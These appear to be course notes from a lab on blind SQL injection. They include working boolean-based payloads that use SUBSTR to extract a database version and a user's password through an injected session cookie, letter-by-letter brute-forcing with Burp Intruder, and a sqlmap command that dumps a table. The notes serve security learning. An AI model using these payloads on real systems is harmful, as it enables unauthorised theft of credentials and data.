Blind SQL

Failed SQL injection

Here SQL map failed to find injectable parameters

We can try injecting the cookie as well

Detecting SQL Injection

If payload length is remaining same, it is also indicator that our query is being processed with no errors

and if it changes with a wrong statement it is an indicator

This is only changing behaviour not giving us any data.

Substring Function

SUBSTR(string, start, length)
LogoW3Schools.comwww.w3schools.com
and substring('alexl',1,1) ='a'#

We can go through the substrings to actually match the substring one by one. This is correct as 1st position is a.

Extracting version number

' and substring((select version()), 1, 1) = '8' #

Finding a password

session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username='jessamy'), 1, 1) = 'b' #

We can send it to intruder and add a list of letters

So the first character is Z and we can continue it

SQL Map

┌──(kali㉿kali)-[~/Downloads/labs]
└─$ sqlmap -r req2.txt --level=2 -D peh-labs -T auth0x02 --dump-all

We require level 2 for bruteforcing cookie parameter.

PreviousSQL InjectionNextXSS

Last updated